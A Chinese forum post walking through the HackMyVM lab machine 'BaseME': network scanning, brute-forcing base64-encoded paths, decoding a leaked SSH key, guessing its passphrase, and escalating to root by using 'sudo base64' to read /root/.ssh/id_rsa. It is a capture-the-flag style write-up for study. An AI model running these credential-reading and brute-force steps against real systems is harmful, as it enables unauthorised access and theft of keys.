电脑疯子技术论坛|电脑极客社区

微信扫一扫 分享朋友圈

已有 551 人浏览分享

hackmyvm系列7——BaseME

[复制链接]
551 0
前言:

*本次文章只用于技术讨论,学习,切勿用于非法用途,用于非法用途与作者无关!所有环境均为在线下载的
靶场且在本机进行学习。

一、信息收集

netdiscover -r 192.168.56.0/24

nmap -sV -Pn -sC -A 192.168.56.169

QQ截图20220513101324.png

只开放了80和22端口,访问页面,对页面的信息进行解码。

QQ截图20220513101422.png

得到一个用户名:lucas,

大概意思是说,需要进行base64加密包括密码,因此对其目录文件进行base64加密爆破。

编写一个简单的脚本。

QQ截图20220513101455.png

QQ截图20220513101632.png

利用其进行目录爆破:

gobuster dir -u http://192.168.56.169/ -w dic.txt -w dic.txt

得到一个文件。

6666.png

666.png

对其进行解码保存,

base64 -d aWRfcnNhCg=\= > a.txt

665.png

二、登录SSH

解码是个id_rsa文件,尝试利用首页的用户名进行连接。

664.png

但是需要密码,尝试爆破,这里肯定需要base64编码,首页的提示。

663.png

iloveyou
youloveyou
shelovesyou
helovesyou
weloveyou
theyhatesme

对其编码后尝试。

662.png

成功登录SSH。

661.png

三、权限提升

sudo -l

发现base64运行任何用户无认证运行。

660.png

可以尝试将root的id_rsa加密后保存到当前目录,之后进行解密登录

sudo -u root base64 /root/.ssh/id_rsa > a.txt

38.png


进行解密

base64 -d a.txt > b.txt

36.png

成功登录root

chmod 600 b.txt

ssh root@127.0.0.1 -i b.txt

6.png

您需要登录后才可以回帖 登录 | 注册

本版积分规则

1

关注

0

粉丝

9021

主题
精彩推荐
热门资讯
网友晒图
图文推荐

Powered by Pcgho! X3.4

© 2008-2022 Pcgho Inc.